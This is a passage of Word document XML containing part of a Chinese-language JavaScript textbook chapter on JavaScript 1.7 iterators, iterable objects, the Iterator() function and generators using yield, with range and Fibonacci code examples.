    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log(r.next());//</w:t>
      </w:r>
      <w:r>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:t>next()</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>catch(e){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(e==StopIteration)break;//</w:t>
      </w:r>
      <w:r>
        <w:t>抛出</w:t>
      </w:r>
      <w:r>
        <w:t>StopIteration</w:t>
      </w:r>
      <w:r>
        <w:t>时退出循环</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else throw 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注意，这里的循环使用一个迭代器对象，并且显式处理</w:t>
      </w:r>
      <w:r>
        <w:t>Stopiteration</w:t>
      </w:r>
      <w:r>
        <w:t>方法，这种方式非常糟糕。因此，我们并不</w:t>
      </w:r>
      <w:r>
        <w:t>经常直接使用迭代器对象，而是使用可迭代的对象。可迭代对象表示一组可迭代处理的值。可迭代对象必须定义一个名叫</w:t>
      </w:r>
      <w:r>
        <w:t>__iterator__()</w:t>
      </w:r>
      <w:r>
        <w:t>的方法（开始和结尾有两条下划线），用以返回这个集合的迭代器对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript 1.7</w:t>
      </w:r>
      <w:r>
        <w:t>对</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>循环的功能进行了扩展，可以用它来遍历可迭代对象。如果关键字</w:t>
      </w:r>
      <w:r>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:t>右侧的值是可迭代的，那么</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>循环会自动调用它的</w:t>
      </w:r>
      <w:r>
        <w:t>__iterator__()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来获得一个迭代器对象。然后它调用迭代器的</w:t>
      </w:r>
      <w:r>
        <w:t>ne xt()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，将返回值赋值给循环变量，随即执行循环体。</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>循环自己会</w:t>
      </w:r>
      <w:r>
        <w:t>处理</w:t>
      </w:r>
      <w:r>
        <w:t>StopIteration</w:t>
      </w:r>
      <w:r>
        <w:t>异常，而且处理过程对开发者是不可见的。下面的代码定义了一个</w:t>
      </w:r>
      <w:r>
        <w:t>range()</w:t>
      </w:r>
      <w:r>
        <w:t>函数，这个函数返回一个可迭代对象（不是迭代器）用以表示某个范围内的整数。我们看到，使用迭代范围的</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>循环要比使用迭代器的</w:t>
      </w:r>
      <w:r>
        <w:t>while</w:t>
      </w:r>
      <w:r>
        <w:t>循环更加简单。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>返回一个可迭代的对象，用以表示该范围内的一个数字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function range(min,max){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return{//</w:t>
      </w:r>
      <w:r>
        <w:t>返回一个表示这个范围的对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>get min(){return min;},//</w:t>
      </w:r>
      <w:r>
        <w:t>范围边界是固定的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>get max(){return m</w:t>
      </w:r>
      <w:r>
        <w:t>ax;},//</w:t>
      </w:r>
      <w:r>
        <w:t>并在闭包内保存起来</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>includes:function(x){//</w:t>
      </w:r>
      <w:r>
        <w:t>检测成员是否属于这个范围</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return min</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=x</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=max;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>toString:function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>以字符串形式输出这个范围</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return"["+min+","+max+"]";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>__iterator__:function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>范围内的整数都是可迭代的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>let val=Math.ceil(min);//</w:t>
      </w:r>
      <w:r>
        <w:t>将当前位置保存在闭包中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return{//</w:t>
      </w:r>
      <w:r>
        <w:t>返回一个迭代器对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>next:function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>返回范围内的下一个值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(val</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>max)//</w:t>
      </w:r>
      <w:r>
        <w:t>如果到达结尾就停止</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>throw StopIteration;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return val++;//</w:t>
      </w:r>
      <w:r>
        <w:t>否则返回下一个值，并自增</w:t>
      </w:r>
      <w:r>
        <w:t>1</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这里我们对这个区间中的值进行迭代</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>for(let i in range(1,10))console.log(i);//</w:t>
      </w:r>
      <w:r>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>之间的数字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>需要注意的是，我们在创建一个可迭代的对象和它的迭代器的时候，尽管必须写一个</w:t>
      </w:r>
      <w:r>
        <w:t>__iterator__()</w:t>
      </w:r>
      <w:r>
        <w:t>方法并抛出一个</w:t>
      </w:r>
      <w:r>
        <w:t>StopIteration</w:t>
      </w:r>
      <w:r>
        <w:t>异常，但在正常使用时并不需要我们去手动调用</w:t>
      </w:r>
      <w:r>
        <w:t>__iterator__()</w:t>
      </w:r>
      <w:r>
        <w:t>方法或手动处理</w:t>
      </w:r>
      <w:r>
        <w:t>StopIteration</w:t>
      </w:r>
      <w:r>
        <w:t>异常，</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>循环会为我们处理这些逻辑。如果出于某种考虑，你想从可迭代的对象中显式获得一个迭代器对象，只需调用</w:t>
      </w:r>
      <w:r>
        <w:t>Iterator()</w:t>
      </w:r>
      <w:r>
        <w:t>函数即可（这个函数是定义在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript 1.7</w:t>
      </w:r>
      <w:r>
        <w:t>中的全局函数）。如果这个函数的参数是一个可迭代的对象，那么它将返回这个对</w:t>
      </w:r>
      <w:r>
        <w:t>象的</w:t>
      </w:r>
      <w:r>
        <w:t>__iterator__()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的调用结果，从而保持代码整洁干净。如果给</w:t>
      </w:r>
      <w:r>
        <w:t>Iterator()</w:t>
      </w:r>
      <w:r>
        <w:t>函数传入第二个参数，这个参数也会参与</w:t>
      </w:r>
      <w:r>
        <w:t>__iterator__()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的调用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>然而，引入</w:t>
      </w:r>
      <w:r>
        <w:t>Iterator()</w:t>
      </w:r>
      <w:r>
        <w:t>函数还有一个重要的目的，如果传入的对象或者数组没有定义</w:t>
      </w:r>
      <w:r>
        <w:t>__iterator__()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，它会返回这个对象的一个可迭代的自定义迭代器。每次调用这个迭代器的</w:t>
      </w:r>
      <w:r>
        <w:t>next()</w:t>
      </w:r>
      <w:r>
        <w:t>方法都会返回其中包含两个值的一个数组，第一个数组元素是一个属性名，第二个是命名属性的值。由于这个对象是可迭代的迭代器，因此它可以直接用于</w:t>
      </w:r>
      <w:r>
        <w:t>for/</w:t>
      </w:r>
      <w:r>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:t>循环，而不用直接调用它的</w:t>
      </w:r>
      <w:r>
        <w:t>next()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。这意味着可以将</w:t>
      </w:r>
      <w:r>
        <w:t>Iteratro()</w:t>
      </w:r>
      <w:r>
        <w:t>函数和解构赋值一起使用，这样可以方便地对对象或数组的属性和值进行遍历：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(let[k,v]in Iterator({a:1,b:2}))//</w:t>
      </w:r>
      <w:r>
        <w:t>对属性和值作迭代</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log(k+"="+v);//</w:t>
      </w:r>
      <w:r>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:t>"a=1"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"b=2"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Iterator()</w:t>
      </w:r>
      <w:r>
        <w:t>函数返回的迭代器还有两个重要的特性。第一，它只对自有属性进行遍历而忽略继承的属性，通常我们希望是这个样子。第二，如果给</w:t>
      </w:r>
      <w:r>
        <w:t>Iterator()</w:t>
      </w:r>
      <w:r>
        <w:t>传入第二个参数</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，返回的迭</w:t>
      </w:r>
      <w:r>
        <w:t>代器只对属性名进行遍历，而忽略属性值。下面这段代码展示了这两种特性：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o={x:1,y:2}//</w:t>
      </w:r>
      <w:r>
        <w:t>定义一个对象，它有两个属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Object.prototype.z=3;//</w:t>
      </w:r>
      <w:r>
        <w:t>所有的对象都继承了</w:t>
      </w:r>
      <w:r>
        <w:t>z</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(p in o)console.log(p);//</w:t>
      </w:r>
      <w:r>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:t>"x"</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>"y"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"z"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(p in Iterator(o,true))console.log(p);//</w:t>
      </w:r>
      <w:r>
        <w:t>只输出</w:t>
      </w:r>
      <w:r>
        <w:t>"x"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"y"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="287" w:name="11_4_3_Sheng_Cheng_Qi_"/>
      <w:r>
        <w:t>11.4.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　生成器</w:t>
      </w:r>
      <w:bookmarkEnd w:id="287"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>生成器是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">JavaScript </w:t>
      </w:r>
      <w:r>
        <w:t>1.7</w:t>
      </w:r>
      <w:r>
        <w:t>中的特性（是从</w:t>
      </w:r>
      <w:r>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:t>中借用过来的概念），这里用到了一个新的关键字</w:t>
      </w:r>
      <w:r>
        <w:t>yield</w:t>
      </w:r>
      <w:r>
        <w:t>，使用这个关键字时代码必须显式指定</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的版本</w:t>
      </w:r>
      <w:r>
        <w:t>1.7</w:t>
      </w:r>
      <w:r>
        <w:t>，就像在</w:t>
      </w:r>
      <w:r>
        <w:t>11.2</w:t>
      </w:r>
      <w:r>
        <w:t>节中提到的。关键字</w:t>
      </w:r>
      <w:r>
        <w:t>yield</w:t>
      </w:r>
      <w:r>
        <w:t>在函数内使用，用法和</w:t>
      </w:r>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:t>类似，返回函数中的一个值。</w:t>
      </w:r>
      <w:r>
        <w:t>yield</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:t>的区别在于，使用</w:t>
      </w:r>
      <w:r>
        <w:t>yield</w:t>
      </w:r>
      <w:r>
        <w:t>的函数</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>产生</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>一个可保持函数内部状态的值，这个值是可以恢复的。这种可恢复性使</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>得</w:t>
      </w:r>
      <w:r>
        <w:t>yield</w:t>
      </w:r>
      <w:r>
        <w:t>成为编写迭代器的有力工具。生成器是一种强大的语言特性，但它初次理解起来可能有些困难，下面给出一些定义。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>任何使用关键字</w:t>
      </w:r>
      <w:r>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t>ield</w:t>
      </w:r>
      <w:r>
        <w:t>的函数（哪怕</w:t>
      </w:r>
      <w:r>
        <w:t>yield</w:t>
      </w:r>
      <w:r>
        <w:t>在代码逻辑中是不可达的）都称为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>生成器函数</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>generator function</w:t>
      </w:r>
      <w:r>
        <w:t>）。生成器函数通过</w:t>
      </w:r>
      <w:r>
        <w:t>yield</w:t>
      </w:r>
      <w:r>
        <w:t>返回值。这些函数中可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:t>来终止函数的执行而不带任何返回值，但不能使用</w:t>
      </w:r>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:t>来返回一个值。除了使用</w:t>
      </w:r>
      <w:r>
        <w:t>yield</w:t>
      </w:r>
      <w:r>
        <w:t>，对</w:t>
      </w:r>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:t>的使用限制也使生成器函数更明显地区别于普通函数。然而和普通的函数一样，生成器函数也通过关键字</w:t>
      </w:r>
      <w:r>
        <w:t>function</w:t>
      </w:r>
      <w:r>
        <w:t>声明，</w:t>
      </w:r>
      <w:r>
        <w:t>typeof</w:t>
      </w:r>
      <w:r>
        <w:t>运算符返回</w:t>
      </w:r>
      <w:r>
        <w:t>"function"</w:t>
      </w:r>
      <w:r>
        <w:t>，并可以从</w:t>
      </w:r>
      <w:r>
        <w:t>Function.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>继承属性和方法。但对生成器函</w:t>
      </w:r>
      <w:r>
        <w:t>数的调用却和普通函数完全不一样，不是执行生成器函数的函数体，而是返回一个生成器对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>生成器是一个对象，用以表示生成器函数的当前执行状态。它定义了一个</w:t>
      </w:r>
      <w:r>
        <w:t>next()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，后者可恢复生成器函数的执行，直到遇到下一条</w:t>
      </w:r>
      <w:r>
        <w:t>yield</w:t>
      </w:r>
      <w:r>
        <w:t>语句为止。这时，生成器函数中的</w:t>
      </w:r>
      <w:r>
        <w:t>yield</w:t>
      </w:r>
      <w:r>
        <w:t>语句的返回值就是生成器的</w:t>
      </w:r>
      <w:r>
        <w:t>next()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的返回值。如果生成器函数通过执行</w:t>
      </w:r>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:t>语句或者到达函数体末尾终止，那么生成器的</w:t>
      </w:r>
      <w:r>
        <w:t>next()</w:t>
      </w:r>
      <w:r>
        <w:t>方法将抛出一个</w:t>
      </w:r>
      <w:r>
        <w:t>StopIteration</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>只要一个对象包含可抛出</w:t>
      </w:r>
      <w:r>
        <w:t>StopIteration</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>next()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，它就</w:t>
      </w:r>
      <w:r>
        <w:t>是一个迭代器对象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[8]</w:t>
      </w:r>
      <w:r>
        <w:t>。实际上，它们是可迭代的迭代器，也就是说，</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>它们可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>循环进行遍历。下面的代码展示了如何简单地使用生成器函数以及对它所生成的返回值进行遍历：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>针对一个整数范围定义一个生成器函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function range(min,max){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(let i=Math.ceil(min);i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=max;i++)yield i;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>调用这个生成器函数以获得一个生成器，并对它进行遍历</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(let n in range(3,8))console.log(n);//</w:t>
      </w:r>
      <w:r>
        <w:t>输出数字</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>生成器函数不需要返回。实际上，最典型的例子就是用生成器来生成</w:t>
      </w:r>
      <w:r>
        <w:t>Fibonacci</w:t>
      </w:r>
      <w:r>
        <w:t>数列：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>一个用以产生一个</w:t>
      </w:r>
      <w:r>
        <w:t>Fibonacci</w:t>
      </w:r>
      <w:r>
        <w:t>数列的生成器函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function fibonacci(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>let x=0,y=1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>while(true){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>yield y;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>[x,y]=[y,x+y];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
